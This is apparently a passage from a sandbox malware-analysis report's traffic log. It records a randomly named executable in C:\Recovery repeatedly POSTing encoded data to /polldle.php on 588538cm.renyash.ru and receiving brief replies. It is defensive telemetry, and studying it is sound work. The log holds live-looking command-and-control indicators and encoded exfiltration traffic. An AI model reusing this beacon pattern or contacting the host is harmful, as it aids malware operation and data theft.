                                                                                Jan 11, 2025 23:34:00.051040888 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:00.323617935 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oahk1BcYJXHaGPQTfif96NBR0pe1zMXca8AuG9zjMKyHDfp5vg3%2F9k6SkkYI7AgrFzNmU%2F81gniGJpFjfqO2ByMEeSPANSDxwkf5K8UJmQW%2FaomkcNnDhaGdZgVw4Vx2E5Smmmlp"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f260cf14343-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1789&rtt_var=799&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=634506&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                84 | 192.168.2.4 | 50092 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:00.545943975 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:00.895585060 CET | 2504 | OUT | Data Raw: 5d 5d 54 56 5f 45 5a 5f 54 5d 55 5a 50 5d 59 5b 50 52 5a 5e 57 57 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TV_EZ_T]UZP]Y[PRZ^WWP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :U2D1; &1=$6 9;;()<+W132R-B;62/(#X'/\/
                                                                                Jan 11, 2025 23:34:01.011190891 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                85 | 192.168.2.4 | 50093 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:01.049936056 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:01.395498037 CET | 1608 | OUT | Data Raw: 5d 5c 51 54 5a 47 5f 5b 54 5d 55 5a 50 5c 59 5c 50 51 5a 53 57 5d 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QTZG_[T]UZP\Y\PQZSW]P][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU , 5%($%1_3* <![; +,32U%-' \",+5#X'/\/4
                                                                                Jan 11, 2025 23:34:01.494530916 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:01.742192030 CET | 950 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vv4PPtIojvLU64MpEIBAzSzNd2t9b%2FDhoHwA5A4m5ESaX9lzla5nhKQihyy3pxEegiamXCsIGmS8mquJFBoDUc4vV9Hiv0NwaELLdOI1gA2WLqwX1xrzJmoFQFJiBWkLo4USvxz1"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f2f18638c29-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8691&min_rtt=2025&rtt_var=14093&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=26372&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0b 33 1a 30 5c 3d 39 33 12 39 3b 33 5d 2e 31 33 00 2a 0f 3a 5d 23 00 28 58 31 1c 38 53 3c 2a 0f 40 3f 03 27 1c 34 3d 22 56 31 39 23 46 0c 1d 22 5d 3e 2f 0d 0b 31 02 24 5d 3c 0d 00 58 32 32 20 42 29 24 0d 54 29 39 26 00 23 3f 22 50 2b 0c 07 51 3e 1b 25 02 2f 21 33 59 25 2a 2e 51 0f 16 21 1c 21 57 3f 07 23 13 3f 1a 32 0e 3c 00 2b 27 24 13 32 3a 06 53 28 33 2d 02 2b 32 01 09 27 3e 3f 56 26 59 25 06 3f 07 2c 0e 29 2b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-30\=939;3].13*:]#(X18S<*@?'4="V19#F"]>/1$]<X22 B)$T)9&#?"P+Q>%/!3Y%*.Q!!W?#?2<+'$2:S(3-+2'>?V&Y%?,)+$\#(V?[M0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                86 | 192.168.2.4 | 50094 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:01.379952908 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:01.739523888 CET | 2504 | OUT | Data Raw: 58 5a 54 5e 5f 45 5a 58 54 5d 55 5a 50 59 59 51 50 56 5a 5c 57 53 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZT^_EZXT]UZPYYQPVZ\WSP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G:U&%;%":%?5#?%Y88#X?7$39-#!2<#X'/\/0
                                                                                Jan 11, 2025 23:34:01.843219042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:02.081406116 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dVDmfnETvfQz0OcpsP0kl3UhXc9zrM4jp1YY7KvhHebpg2pSLLG2SERXE6uBloq02J3jcBe9W5dQCJYByZHcX3W7mauWSb%2F4VBrYHhRaDsZCcNFYQ7sCHzY51NShs3WV9F53AIh"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f313b72436c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8339&min_rtt=1798&rtt_var=13757&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26971&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                87 | 192.168.2.4 | 50095 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:02.210563898 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:34:02.567572117 CET | 2504 | OUT | Data Raw: 58 5b 54 50 5f 45 5a 5a 54 5d 55 5a 50 5e 59 58 50 52 5a 5c 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[TP_EZZT]UZP^YXPRZ\WPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :0%%$&"Y3?"41Y/<</#&9:?!0?#X'/\/,
                                                                                Jan 11, 2025 23:34:02.683669090 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:02.847615957 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NLukmRKPfdlFQMNl6gM5WZiGfVLmBX32x74KK53ejlespFkrD7DhyXfvS7ky4YIAjozguhHCfgtwtHlGL%2FTP1vwWUfnBtSvnGiCC3%2BMaF2gY38vsN%2FvwqDOdVGbf75B9xa2MnfkI"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f367dfb8ce6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3642&min_rtt=2371&rtt_var=3432&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=116399&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                88 | 192.168.2.4 | 50096 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:02.976263046 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:03.333043098 CET | 2504 | OUT | Data Raw: 58 59 54 56 5a 47 5a 5b 54 5d 55 5a 50 5b 59 5b 50 54 5a 5b 57 54 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XYTVZGZ[T]UZP[Y[PTZ[WTP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -&+'%&%?. %_-;/(/R1#W9$$[",?#X'/\/
                                                                                Jan 11, 2025 23:34:03.431459904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:03.666830063 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5C6DSKI2b4ufw7TXCkVYIBLN78g%2B%2Ba4N%2BpwLZ2IbYMYULJymft5H6MPGi2XcAxWH%2FdZIYTRcQkeiRdXolSS2EJYbXV7p49mGVvwgeExA2hJD3tz5yB10NO5thsB5%2Bk4RUhNO4SZo"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f3b2cd9422d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4798&min_rtt=1688&rtt_var=6853&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=54949&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                89 | 192.168.2.4 | 50097 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:03.786720037 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:04.145536900 CET | 2504 | OUT | Data Raw: 58 5c 54 54 5f 46 5a 58 54 5d 55 5a 50 5b 59 58 50 5c 5a 5f 57 56 50 5f 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TT_FZXT]UZP[YXP\Z_WVP_[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B, .$80&"\$?*4X,+71-944Z"+Y+%#X'/\/
                                                                                Jan 11, 2025 23:34:04.233973980 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:04.395659924 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YBnhoqbsFJMRShHslYWAxjLZobPr5PkmDLqiuG%2BnfOAdlgJNwrJR5TkztbSd5rB5UCl3xrcVkH8io%2BUFq39w6fdZyvN31OqgugpQLDEgKM%2BwVHAOIQXiW5MTc%2Fny7CaxdoVl35Z"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f403ef043ee-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2244&min_rtt=1716&rtt_var=1699&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=245749&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                90 | 192.168.2.4 | 50098 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:04.523776054 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:04.879851103 CET | 2504 | OUT | Data Raw: 5d 5b 51 50 5f 41 5a 59 54 5d 55 5a 50 58 59 5c 50 55 5a 52 57 52 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QP_AZYT]UZPXY\PUZRWRP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU ,3C2881!:$<-7=_,+<< 1:. 5#+%#X'/\/4
                                                                                Jan 11, 2025 23:34:04.987528086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:05.222903967 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t6BBKA0UaclCtF0ki1I%2FpdxPVr65AzWWhHD89hQC27PvZ61LwqGHzmX4WXK2N4ESj0ctWp0Ye9FlZdK2%2F8DLXxWtJ%2BQ2UQzs1Rvzfsg%2FY40QxmpFgMmM4Aa9nqIcbT%2Bx%2FhL63EH%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f44ecfc8cd4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4148&min_rtt=1932&rtt_var=5157&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=74247&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                91 | 192.168.2.4 | 50099 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:05.350532055 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:05.707966089 CET | 2504 | OUT | Data Raw: 58 51 54 52 5f 44 5a 59 54 5d 55 5a 50 5b 59 5a 50 57 5a 5b 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTR_DZYT]UZP[YZPWZ[WWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B-3&$;31">0"7,!_/88<<&6R.B?!!/(#X'/\/
                                                                                Jan 11, 2025 23:34:05.822393894 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:06.058305025 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fcxb8%2BnGc6L1cPiPXlRertmGdk2h4NYxL6BWGF9uBZOlix25R87rDiuIyew3olCCI9hCtKjWMlMZdZ8EpQ4jtvmmBZ0E1ntS8N8RQnV%2FSrWQz7LwIY9w8jPwZOPLw5FvI4u1v8pi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085f4a1fd678e7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3266&min_rtt=1913&rtt_var=3425&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=114572&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                92 | 192.168.2.4 | 50100 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:06.179019928 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:06.536218882 CET | 2504 | OUT | Data Raw: 58 5d 54 55 5f 43 5a 5b 54 5d 55 5a 50 5a 59 5c 50 5c 5a 5e 57 55 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]TU_CZ[T]UZPZY\P\Z^WUP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-#5%;?2"'<%7<&/+X?+1 :9<Z52?\(#X'/\/<
                                                                                Jan 11, 2025 23:34:06.635458946 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                93 | 192.168.2.4 | 50101 | 104.21.38.84 | 80
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:34:06.761527061 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:34:07.114298105 CET | 1620 | OUT | Data Raw: 58 50 54 5e 5a 47 5f 5c 54 5d 55 5a 50 5b 59 5f 50 54 5a 5c 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPT^ZG_\T]UZP[Y_PTZ\WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#. &&;8]&5^35V7?%Z;;'?/1#-,4(#!3]*%#X'/\/
                                                                                Jan 11, 2025 23:34:07.207566977 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:34:07.456801891 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:34:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
